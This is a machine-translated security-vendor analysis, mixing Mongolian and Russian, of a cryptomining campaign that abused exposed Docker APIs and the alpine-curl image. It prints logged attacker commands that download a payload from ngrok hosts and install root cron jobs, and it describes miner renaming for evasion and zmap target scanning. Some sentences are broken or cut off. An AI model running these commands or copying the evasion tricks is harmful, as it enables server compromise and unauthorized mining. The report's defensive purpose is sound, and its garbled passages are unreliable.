Бид аюул заналыг хянах зорилгоор бүтээсэн зөгийн балны сав ашиглан цуглуулсан мэдээлэлд дүн шинжилгээ хийсэн. Мөн бид Docker Hub дээр олон нийтийн нийтэлсэн зургийг ашиглан хуурамч чингэлэг болгон байршуулсан хүсээгүй эсвэл зөвшөөрөлгүй криптовалют олборлогчдын томоохон үйл ажиллагааг илрүүлсэн. Уг зургийг хортой криптовалют олборлогчдод хүргэх үйлчилгээний нэг хэсэг болгон ашиглаж байна.
Нэмж дурдахад хөрш зэргэлдээх нээлттэй контейнерууд болон програмууд руу нэвтрэхийн тулд сүлжээтэй ажиллах програмуудыг суулгасан болно.
Бид зөгийн балны савыг ямар ч аюулгүй байдлын арга хэмжээ авахгүй, дараа нь нэмэлт програм суулгахгүйгээр анхдагч тохиргоотойгоор нь үлдээдэг. Алдаа болон энгийн эмзэг байдлаас зайлсхийхийн тулд Docker-д анхны тохиргоо хийх зөвлөмжүүд байгааг анхаарна уу. Гэхдээ ашигласан зөгийн бал нь савны доторх программ биш харин савлах платформ руу чиглэсэн халдлагыг илрүүлэх зориулалттай сав юм.
Илэрсэн хортой үйл ажиллагаа нь эмзэг байдал шаарддаггүй, мөн Docker хувилбараас хамааралгүй учраас бас анхаарал татаж байна. Буруу тохируулагдсан, тиймээс нээлттэй контейнерийн дүрсийг олох нь халдагчид олон нээлттэй серверүүдийг халдварлахад шаардлагатай зүйл юм.
Хаалтгүй Docker API нь хэрэглэгчдэд өргөн хүрээний үйлдлийг гүйцэтгэх боломжийг олгодог , үүнд ажиллаж байгаа контейнеруудын жагсаалтыг авах, тодорхой контейнерээс лог авах, эхлүүлэх, зогсоох (албадан оруулах) болон тодорхой зурагнаас шинэ контейнер үүсгэх хүртэл заасан тохиргоотой.
Зүүн талд хортой програмыг хүргэх арга байна. Баруун талд халдагчийн орчин байгаа бөгөөд энэ нь зургийг алсаас эргүүлэх боломжийг олгодог.
3762 нээлттэй Docker API-ийн улсаар хуваарилалт. 12.02.2019-ны өдрийн Шодан хайлтад үндэслэсэн
Довтолгооны гинж ба ачааны ачааллын сонголтууд
Хортой үйл ажиллагааг зөвхөн зөгийн балны тусламжтайгаар илрүүлсэнгүй. Шоданаас авсан мэдээллээс харахад бид Monero криптовалют олборлох программ хангамжийг байрлуулах гүүр болгон ашигласан буруу тохируулагдсан контейнерийг судалснаас хойш ил гарсан Docker API-уудын тоо (хоёр дахь графикийг харна уу) нэмэгдсэнийг харуулж байна. Өнгөрсөн оны аравдугаар сард (2018 он, одоогийн мэдээлэл ойролцоогоор. орчуулагч) зөвхөн 856 нээлттэй API байсан.
Зөгийн балны гуалин дээр хийсэн судалгаанаас үзэхэд савны дүрсний хэрэглээ нь мөн адил хэрэглээтэй холбоотой болохыг харуулсан , аюулгүй холболтыг бий болгох эсвэл нийтийн хүртээмжтэй цэгүүдээс заасан хаяг эсвэл нөөц рүү (жишээ нь localhost) урсгалыг дамжуулах хэрэгсэл. Энэ нь халдагчдад ачааллыг нээлттэй серверт хүргэх үед URL-уудыг динамикаар үүсгэх боломжийг олгодог. Доорх нь ngrok үйлчилгээг буруугаар ашиглаж байгааг харуулсан логуудын кодын жишээнүүд юм:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Таны харж байгаагаар байршуулсан файлууд нь байнга өөрчлөгддөг URL-аас татагддаг. Эдгээр URL-ууд нь богино хугацааны хугацаатай тул хугацаа дууссаны дараа ачааллыг татаж авах боломжгүй.
Есть два варианта полезной нагрузки. Первый — скомпилированный майнер в формате ELF для Linux (определяемый как Coinminer.SH.MALXMR.ATNO), который подключается к пулу для майнинга. Второй — скрипт (TrojanSpy.SH.ZNETMAP.A), предназначенный для получения определенных сетевых инструментов, используемых для сканирования сетевых диапазонов и последующего поиска новых целей.
Дусаагчийн скрипт нь хоёр хувьсагчийг тохируулж, дараа нь криптовалютын олборлогчийг байрлуулахад ашигладаг. HOST хувьсагч нь хортой файлууд байрладаг URL-г агуулдаг ба RIP хувьсагч нь байршуулах олборлогчийн файлын нэр (үнэндээ хэш) юм. Хэш хувьсагч өөрчлөгдөх бүрт HOST хувьсагч өөрчлөгддөг. Энэ скрипт нь халдлагад өртсөн сервер дээр өөр ямар ч криптовалют олборлогчид ажиллаж байгаа эсэхийг шалгахыг оролддог.
HOST болон RIP хувьсагчийн жишээ, түүнчлэн өөр уурхайчин ажиллаж байгаа эсэхийг шалгахад ашигладаг кодын хэсэг
Прежде чем запускать майнер, он переименовывается в nginx. Другие версии этого скрипта переименовывают майнер в другие легитимные сервисы, которые могут присутствовать в окружениях Linux. Этого обычно достаточно для обхода проверок по списку запущенных процессов.
Хайлтын скрипт нь мөн онцлог шинж чанартай байдаг. Энэ нь шаардлагатай хэрэгслүүдийг байршуулахын тулд ижил URL үйлчилгээтэй ажилладаг. Тэдгээрийн дотор сүлжээг сканнердах, нээлттэй портуудын жагсаалтыг авахад ашигладаг zmap хоёртын хувилбар юм. Скрипт нь олсон үйлчилгээтэй харилцах, тэдгээрээс баннер хүлээн авахад ашигладаг өөр хоёртын файлыг ачаалж, олсон үйлчилгээний талаарх нэмэлт мэдээллийг (жишээлбэл, түүний хувилбар) тодорхойлоход ашигладаг.
Скрипт нь сканнердах зарим сүлжээний хүрээг урьдчилан тодорхойлдог боловч энэ нь скриптийн хувилбараас хамаарна. Энэ нь скан хийхээс өмнө үйлчилгээнүүдийн зорилтот портуудыг (энэ тохиолдолд Docker) тохируулдаг.
Как только найдены предполагаемые цели — автоматически из них снимаются баннеры. Скрипт также фильтрует цели в зависимости от интересующих его сервисов, приложений, компонентов или платформ: Redis, Jenkins, Drupal, MODX, , Docker 1.16 үйлчлүүлэгч болон Apache CouchDB. Хэрэв сканнердсан сервер нь тэдгээрийн аль нэгтэй нь таарч байвал энэ нь текст файлд хадгалагдах бөгөөд халдагчид дараа нь шинжилгээ хийх, хакердах зорилгоор ашиглах боломжтой. Эдгээр текст файлуудыг динамик холбоосоор дамжуулан халдагчдын серверт байршуулдаг. Өөрөөр хэлбэл, файл бүрт тусдаа URL ашигладаг бөгөөд энэ нь дараагийн хандалт хийхэд хэцүү гэсэн үг юм.
Довтолгооны вектор нь Докерын дүрс бөгөөд дараагийн хоёр кодоос харж болно.
Дээд талд нь хууль ёсны үйлчилгээ болгон нэрийг нь өөрчлөх, доод талд нь сүлжээг скан хийхэд zmap хэрхэн ашиглагддаг талаар бичсэн байна.
Дээд талд нь урьдчилан тодорхойлсон сүлжээний мужууд, доод талд нь Docker зэрэг үйлчилгээ хайх тусгай портууд байна.
Дэлгэцийн агшингаас харахад уулын буржгар зургийг 10 сая гаруй удаа татсан байна
На основе Alpine Linux и curl, ресурсоэффективного инструмента CLI для передачи файлов по различным протоколам, можно собрать . Өмнөх зургаас харахад энэ зураг аль хэдийн 10 сая гаруй удаа татагдсан байна. Олон тооны татан авалт нь энэ зургийг нэвтрэх цэг болгон ашиглахыг хэлж болно; энэ зургийг зургаан сар гаруйн өмнө шинэчилсэн; хэрэглэгчид энэ агуулахаас бусад зургийг байнга татаж авдаггүй. Докер дээр - савыг ажиллуулахын тулд түүнийг тохируулах зааврын багц. Хэрэв нэвтрэх цэгийн тохиргоо буруу байвал (жишээлбэл, савыг интернетээс нээлттэй орхисон) зургийг халдлагын вектор болгон ашиглаж болно. Халдагчид буруу тохируулагдсан эсвэл нээлттэй савыг дэмжигдээгүй орхисон тохиолдолд ачаа хүргэхийн тулд үүнийг ашиглаж болно.
Энэ зураг (alpine-curl) нь өөрөө хор хөнөөлтэй биш гэдгийг анхаарах нь чухал боловч дээр дурдсанчлан хортой функцийг гүйцэтгэхэд ашиглаж болно. Үүнтэй төстэй Docker зургуудыг хортой үйлдэл хийхэд ашиглаж болно. Бид Докертой холбогдож, энэ асуудлаар тэдэнтэй хамтран ажилласан.
зөвлөмж
үлдэгдэл олон компаниуд, ялангуяа хэрэгжүүлж буй компаниудын хувьд , хурдацтай хөгжүүлэх, хүргэхэд чиглэсэн. Аудит, хяналтын дүрмийг дагаж мөрдөх шаардлага, мэдээллийн нууцлалд хяналт тавих шаардлага, түүнчлэн тэдгээрийг дагаж мөрдөөгүйгээс асар их хохирол учирч байгаа нь бүх зүйлийг улам хүндрүүлдэг. Аюулгүй байдлын автоматжуулалтыг хөгжүүлэлтийн амьдралын мөчлөгт оруулах нь илрээгүй байж болзошгүй аюулгүй байдлын цоорхойг олоход тусалдаг төдийгүй, програмыг суулгасны дараа илрүүлсэн эмзэг байдал, тохиргооны алдаа тус бүрд нэмэлт програм хангамжийг ажиллуулах гэх мэт шаардлагагүй ажлын ачааллыг бууруулахад тусалдаг.
Энэ нийтлэлд авч үзсэн үйл явдал нь аюулгүй байдлыг эхнээс нь анхаарч үзэх шаардлагатайг онцлон тэмдэглэж, үүнд дараах зөвлөмжүүд багтсан болно.
- Системийн администраторууд болон хөгжүүлэгчдэд: Бүх зүйл зөвхөн тодорхой сервер эсвэл дотоод сүлжээний хүсэлтийг хүлээн авахаар тохируулагдсан эсэхийг шалгахын тулд API тохиргоогоо үргэлж шалгаарай.
- Хамгийн бага эрхийн зарчмыг баримтал: чингэлэгийн дүрсийг гарын үсэг зурж, баталгаажуулж, чухал бүрэлдэхүүн хэсгүүдэд хандах хандалтыг хязгаарлах (контейнер хөөргөх үйлчилгээ) болон сүлжээний холболтод шифрлэлт нэмнэ.
- Дагах аюулгүй байдлын механизмыг идэвхжүүлэх, жишээлбэл. болон суурилуулсан .
- Контейнер дээр ажиллаж байгаа процессуудын талаар нэмэлт мэдээлэл авахын тулд (жишээ нь, хууран мэхлэлт илрүүлэх эсвэл эмзэг байдлыг хайх) автоматаар ажиллах хугацаа, зургийг сканнердах боломжтой. Аппликешны хяналт болон бүрэн бүтэн байдлын хяналт нь сервер, файл болон системийн хэсэгт гарсан хэвийн бус өөрчлөлтийг хянахад тусалдаг.
Trendmicro нь DevOps-ын багуудад найдвартай бүтээх, хурдан гаргах, хаана ч ажиллуулахад тусалдаг. Trend Micro Байгууллагын DevOps дамжуулах шугамаар хүчирхэг, хялбаршуулсан, автоматжуулсан аюулгүй байдлыг хангаж, олон аюулаас хамгаалах хамгаалалтыг хангадаг. ажиллах үед физик, виртуаль болон үүлэн ачааллыг хамгаалах. Энэ нь мөн савны хамгаалалтыг нэмдэг и , энэ нь Docker контейнерийн зургийг байршуулахаас өмнө аюулаас урьдчилан сэргийлэхийн тулд хөгжүүлэлтийн шугамын аль ч цэгт хортой программ хангамж, эмзэг байдлыг сканнердаж байна.
Бууйлтын шинж тэмдэг
Холбогдох хэшүүд:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
дээр Дадлага хийж буй илтгэгчид дээр дурдсан нөхцөл байдал үүсэх магадлалыг багасгах эсвэл бүрмөсөн зайлсхийхийн тулд юуны өмнө ямар тохиргоо хийх шаардлагатайг харуулдаг. Мөн 19-р сарын 21-XNUMX-нд онлайн эрчимжүүлсэн Та эдгээр болон үүнтэй төстэй аюулгүй байдлын асуудлуудыг хамтран ажиллагсад, дадлагажигч багш нартай дугуй ширээний ард ярилцаж, хүн бүр ярьж, туршлагатай хамт ажиллагсдынхаа зовлон шаналал, амжилтыг сонсох боломжтой.
Эх сурвалж: www.habr.com
